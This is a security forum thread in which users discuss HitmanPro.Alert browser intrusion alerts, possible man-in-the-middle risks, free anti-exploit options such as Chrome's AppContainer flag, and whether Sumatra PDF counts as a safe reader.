giants8058

Level 4
If those browser intrusion alerts are legitimate, then that means that there is an active infection already on your system... ;)

Banking trojans and other financial malware just don't run from a webpage inside your browser without touching your system - they're actually installed onto your system.

You better get someone to either check out those HMP.A alerts or take a look at your system.
Yeah I did. Sent Surfright the logs and they said all was good. I was skeptical at first, but they assured me it was OK. The browser border went back to green after close/re-open. There were a couple of times where I was literally doing nothing but had the browser window open, and I got the alert. I was thinking it was FP, but I couldn't tell for sure. I recently did a full wipe and reinstall and after that I received one alert. I know for sure my system was clean at the time. Is it possible that a MITM attack of an active session inject code that could affect the browser itself or would only the data streams be compromised?
 
Last edited:

Handsome Recluse

Level 21
Verified
@Arequire Maybe they're trying to force good habits on businesses like they did with UAC and developers. App and OS updates are in the top 4 mitigation strategies in asd.gov.au after all
 
5

509322

only the data streams
For MitM the chumps want to intercept your packets and have a "look-see"... use a VPN as a counter-measure if that worries you. If you don't do heavy online financial activities, then don't worry about it.

As for the other stuff it would be, for example, if they get you to a webpage and tamper with the browser or one of its processes to exploit a vulnerability and obtain escalation of privilege. That's why your using HMP.A - to prevent this sort of thing from happening.
 
Last edited by a moderator:
  • Like
Reactions: giants8058

Arequire

Level 23
Verified
Content Creator
@Arequire Maybe they're trying to force good habits on businesses like they did with UAC and developers. App and OS updates are in the top 4 mitigation strategies in asd.gov.au after all
Maybe. Either way I guess businesses will have to adapt to the change. Maybe sysadmins can look at it like one less thing to manage. :p
 
  • Like
Reactions: RXZ6Q

orthonovum

Level 3
I don't think there are any good free anti-exploits

if you are on windows 8 or 10, enable the appcontainer flag in chrome. That is anti-exploit protection.
And use a safe PDF reader as default, such as Sumatra.
In other words, you will need to do piece-meal exploit protection, or buy HitmanPro.Alert.
BTW... I would not call Sumatra a "safe" PDF reader. In fact I like to use it for priv esc demonstrations ;)
 
5

509322

BTW... I would not call Sumatra a "safe" PDF reader. In fact I like to use it for priv esc demonstrations ;)
Sumatra is a safe PDF reader in that most of the functionality is ripped out of it to thwart malicious\weaponized PDFs.

You can use just about any process to elevate privileges so it is not something inherently wrong or different with Sumatra.
 

orthonovum

Level 3
Sumatra is a safe PDF reader in that most of the functionality is ripped out of it to thwart malicious\weaponized PDFs.

You can use just about any process to elevate privileges so it is not something inherently wrong or different with Sumatra.
I'm not sure that is a 100% true statement ;) but ok
 
5

509322

I'm not sure that is a 100% true statement ;) but ok
If you have a Sumatra PDF exploit, then please demonstrate it to the community. There have been exploits of Sumatra PDF reported in the past, but only a very few compared to popular PDF readers such as Adobe. Sumatra PDF is a safer bet compared to the much more targeted other PDF readers.

And yes, if you look hard and long enough, you will eventually find vulnerabilities of one sort or another in just about any soft. It is just a matter of time.